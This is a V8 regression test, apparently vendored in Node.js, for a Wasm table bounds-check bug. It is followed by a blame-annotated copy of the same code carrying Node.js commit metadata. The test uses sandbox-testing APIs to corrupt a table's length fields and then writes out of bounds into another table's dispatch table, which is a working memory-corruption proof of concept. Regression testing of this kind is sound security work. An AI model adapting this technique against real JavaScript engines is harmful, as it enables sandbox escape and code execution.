nodejs/deps/v8/test/mjsunit/sandbox/regress/regress-349502157.js

// Copyright 2024 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

// Flags: --sandbox-testing

d8.file.execute('test/mjsunit/wasm/wasm-module-builder.js');

let builder = new WasmModuleBuilder();
let $struct = builder.addStruct([makeField(kWasmI64, true)]);
let $sig_v_ls = builder.addType(makeSig([kWasmI64, wasmRefType($struct)], []));
let $sig_v_ll = builder.addType(makeSig([kWasmI64, kWasmI64], []));
let $writer = builder.addFunction("writer", $sig_v_ls)
  .exportFunc()
  .addBody([
    kExprLocalGet, 1,
    kExprLocalGet, 0,
    kGCPrefix, kExprStructSet, $struct, 0,
  ]);
let $boom = builder.addFunction("boom", $sig_v_ll)
  .exportFunc()
  .addBody([
    kExprLocalGet, 1,
    kExprLocalGet, 0,
    kExprI32Const, 0,
    kExprCallIndirect, $sig_v_ll, 0,
  ])
let $dummy = builder.addFunction("dummy", $sig_v_ll).exportFunc().addBody([]);
// Target table.
let $t0 = builder
    .addTable(wasmRefType($sig_v_ll), 1, 1, [kExprRefFunc, $dummy.index])
    .exportAs('table_v_ll');
// Padding tables for alignment.
let $td0 = builder.addTable(
    wasmRefType($sig_v_ll), 1, 1, [kExprRefFunc, $dummy.index]);
let $td1 = builder.addTable(
    wasmRefType($sig_v_ll), 1, 1, [kExprRefFunc, $dummy.index]);
let $td2 = builder.addTable(
    wasmRefType($sig_v_ll), 1, 1, [kExprRefFunc, $dummy.index]);
// OOB table.
let $t1 = builder
    .addTable(wasmRefType($sig_v_ls), 1, 1, [kExprRefFunc, $writer.index])
    .exportAs("table_v_ls");

let instance = builder.instantiate();
let { writer, dummy, boom, table_v_ls, table_v_ll } = instance.exports;

// Prepare corruption utilities.
const kHeapObjectTag = 1;
const kWasmTableType = Sandbox.getInstanceTypeIdFor('WASM_TABLE_OBJECT_TYPE');
const kWasmTableObjectCurrentLengthOffset = Sandbox.getFieldOffset(kWasmTableType, 'current_length');
const kWasmTableObjectMaximumLengthOffset = Sandbox.getFieldOffset(kWasmTableType, 'maximum_length');
let memory = new DataView(new Sandbox.MemoryView(0, 0x100000000));
function getPtr(obj) {
  return Sandbox.getAddressOf(obj) + kHeapObjectTag;
}
function getField(obj, offset) {
  return memory.getUint32(obj + offset - kHeapObjectTag, true);
}
function setField(obj, offset, value) {
  memory.setUint32(obj + offset - kHeapObjectTag, value, true);
}

const kSmiMinusOne = 0xfffffffe;
setField(getPtr(table_v_ls), kWasmTableObjectCurrentLengthOffset, kSmiMinusOne);
setField(getPtr(table_v_ls), kWasmTableObjectMaximumLengthOffset, kSmiMinusOne);

// Check bypassed, write @ index -7 -> writes into table_v_ll dispatch table!
table_v_ls.set(0xfffffff9, writer);

boom(0x414141414141n, 42n);
deps: update V8 to 12.8.374.13 PR-URL: https://github.com/nodejs/node/pull/54077 Reviewed-By: Jiawen Geng <technicalcute@gmail.com> Reviewed-By: Richard Lau <rlau@redhat.com> Reviewed-By: Joyee Cheung <joyeec9h3@gmail.com> Reviewed-By: Marco Ippolito <marcoippolito54@gmail.com> 2024-08-14 20:41:00 +02:00			`// Copyright 2024 the V8 project authors. All rights reserved.`
			`// Use of this source code is governed by a BSD-style license that can be`
			`// found in the LICENSE file.`

			`// Flags: --sandbox-testing`

			`d8.file.execute('test/mjsunit/wasm/wasm-module-builder.js');`

			`let builder = new WasmModuleBuilder();`
			`let $struct = builder.addStruct([makeField(kWasmI64, true)]);`
			`let $sig_v_ls = builder.addType(makeSig([kWasmI64, wasmRefType($struct)], []));`
			`let $sig_v_ll = builder.addType(makeSig([kWasmI64, kWasmI64], []));`
			`let $writer = builder.addFunction("writer", $sig_v_ls)`
			`.exportFunc()`
			`.addBody([`
			`kExprLocalGet, 1,`
			`kExprLocalGet, 0,`
			`kGCPrefix, kExprStructSet, $struct, 0,`
			`]);`
			`let $boom = builder.addFunction("boom", $sig_v_ll)`
			`.exportFunc()`
			`.addBody([`
			`kExprLocalGet, 1,`
			`kExprLocalGet, 0,`
			`kExprI32Const, 0,`
			`kExprCallIndirect, $sig_v_ll, 0,`
			`])`
			`let $dummy = builder.addFunction("dummy", $sig_v_ll).exportFunc().addBody([]);`
			`// Target table.`
			`let $t0 = builder`
			`.addTable(wasmRefType($sig_v_ll), 1, 1, [kExprRefFunc, $dummy.index])`
			`.exportAs('table_v_ll');`
			`// Padding tables for alignment.`
			`let $td0 = builder.addTable(`
			`wasmRefType($sig_v_ll), 1, 1, [kExprRefFunc, $dummy.index]);`
			`let $td1 = builder.addTable(`
			`wasmRefType($sig_v_ll), 1, 1, [kExprRefFunc, $dummy.index]);`
			`let $td2 = builder.addTable(`
			`wasmRefType($sig_v_ll), 1, 1, [kExprRefFunc, $dummy.index]);`
			`// OOB table.`
			`let $t1 = builder`
			`.addTable(wasmRefType($sig_v_ls), 1, 1, [kExprRefFunc, $writer.index])`
			`.exportAs("table_v_ls");`

			`let instance = builder.instantiate();`
			`let { writer, dummy, boom, table_v_ls, table_v_ll } = instance.exports;`

			`// Prepare corruption utilities.`
			`const kHeapObjectTag = 1;`
deps: update V8 to 13.0.245.25 PR-URL: https://github.com/nodejs/node/pull/55014 Reviewed-By: Matteo Collina <matteo.collina@gmail.com> Reviewed-By: Yagiz Nizipli <yagiz@nizipli.com> 2025-01-30 16:35:04 +01:00			`const kWasmTableType = Sandbox.getInstanceTypeIdFor('WASM_TABLE_OBJECT_TYPE');`
			`const kWasmTableObjectCurrentLengthOffset = Sandbox.getFieldOffset(kWasmTableType, 'current_length');`
			`const kWasmTableObjectMaximumLengthOffset = Sandbox.getFieldOffset(kWasmTableType, 'maximum_length');`
deps: update V8 to 12.8.374.13 PR-URL: https://github.com/nodejs/node/pull/54077 Reviewed-By: Jiawen Geng <technicalcute@gmail.com> Reviewed-By: Richard Lau <rlau@redhat.com> Reviewed-By: Joyee Cheung <joyeec9h3@gmail.com> Reviewed-By: Marco Ippolito <marcoippolito54@gmail.com> 2024-08-14 20:41:00 +02:00			`let memory = new DataView(new Sandbox.MemoryView(0, 0x100000000));`
			`function getPtr(obj) {`
			`return Sandbox.getAddressOf(obj) + kHeapObjectTag;`
			`}`
			`function getField(obj, offset) {`
			`return memory.getUint32(obj + offset - kHeapObjectTag, true);`
			`}`
			`function setField(obj, offset, value) {`
			`memory.setUint32(obj + offset - kHeapObjectTag, value, true);`
			`}`

			`const kSmiMinusOne = 0xfffffffe;`
			`setField(getPtr(table_v_ls), kWasmTableObjectCurrentLengthOffset, kSmiMinusOne);`
			`setField(getPtr(table_v_ls), kWasmTableObjectMaximumLengthOffset, kSmiMinusOne);`

			`// Check bypassed, write @ index -7 -> writes into table_v_ll dispatch table!`
			`table_v_ls.set(0xfffffff9, writer);`

deps: update V8 to 13.6.233.8 PR-URL: https://github.com/nodejs/node/pull/58070 Reviewed-By: Antoine du Hamel <duhamelantoine1995@gmail.com> Reviewed-By: Darshan Sen <raisinten@gmail.com> Reviewed-By: Joyee Cheung <joyeec9h3@gmail.com> Reviewed-By: Rafael Gonzaga <rafael.nunu@hotmail.com> 2025-04-29 08:03:15 +02:00			`boom(0x414141414141n, 42n);`